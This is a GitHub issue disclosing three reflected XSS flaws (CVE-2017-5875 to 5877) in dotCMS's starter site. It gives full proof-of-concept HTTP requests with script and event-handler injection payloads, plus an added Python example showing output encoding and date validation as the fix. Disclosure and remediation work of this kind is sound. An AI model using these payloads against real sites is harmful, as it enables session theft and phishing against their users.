Multiple XSS in Starter Site Implementation #10643

Closed
Belladona-c0re opened this issue Feb 6, 2017 · 3 comments

Belladona-c0re commented Feb 6, 2017

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.dotcms.com/dotCMS/myAccount
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

dispatch=editUserAddress&userId=%24%7BmyAccountForm.userId%7D&addressID=0q6rt0"><script>alert(1)<%2fscript>bewiz&prefix=other&firstName=Admin&lastName=User&suffix=&title=&emailAddress=admin%40dotcms.com&password=&newPassword=

XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1

XSS CVE-2017-5877:

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500


How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
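
The fix that cheat sheet describes, applied to the three parameters reported above, as an added example that is not part of the original issue and not dotCMS code. The `<input>` template and all function names are assumptions, since the issue does not show the rendering code; the parameter values are the ones quoted in the requests.

```python
import html
import re
from datetime import date
from urllib.parse import unquote

# URL-decoded values of the three reflected parameters quoted in the issue.
REPORTED = {
    "addressID": unquote('0q6rt0"><script>alert(1)<%2fscript>bewiz'),
    "date": unquote('2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute'
                    '%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q'),
    "direction": unquote('testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3'),
}

def render_unsafe(name, value):
    """Hypothetical 'before': the raw parameter is concatenated into the attribute."""
    return f'<input type="text" name="{name}" value="{value}">'

def render_encoded(name, value):
    """'After': encode for a double-quoted HTML attribute (escapes & < > " ')."""
    # html.escape covers element-body and quoted-attribute contexts only; values
    # placed in script blocks, URLs or CSS need the encoder for that context.
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'

def parse_date_param(value):
    """Allow-list validation for `date`: a real YYYY-MM-DD date, else None."""
    if not re.fullmatch(r"\d{4}-\d{2}-\d{2}", value):
        return None
    try:
        return date.fromisoformat(value)
    except ValueError:  # well-formed but impossible, e.g. 2017-13-40
        return None

def breaks_out(markup):
    """True when markup follows the closing quote of value="..." inside the tag."""
    m = re.search(r'value="([^"]*)"(.*)>$', markup, re.S)
    return m is None or m.group(2) != ""

if __name__ == "__main__":
    for name, value in REPORTED.items():
        print(name, breaks_out(render_unsafe(name, value)),
              breaks_out(render_encoded(name, value)))
    print(parse_date_param(REPORTED["date"]), parse_date_param("2017-02-02"))
```

Encoding at output is the primary control for all three parameters; the date check is an additional input-side control that only applies where the parameter has a strict format.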


stale bot commented Sep 28, 2019

This issue has been automatically marked as stale because it has not had activity within the past 90 days. It will be closed in 30 days if no further activity occurs. Thank you.

@stale stale bot added the wontfix label Sep 28, 2019
@stale stale bot closed this as completed Oct 28, 2019

NicoleG25 commented Jan 8, 2020

Was this vulnerability ever addressed?
Note that CVE-2017-5877 was assigned.

@wezell wezell changed the title Multiple XSS in dotCMS - 3.7.0 Multiple XSS in Starter Site Implementation Jan 8, 2020
@NicoleG25

@wezell @fabrizzio-dotCMS Any response to the above?
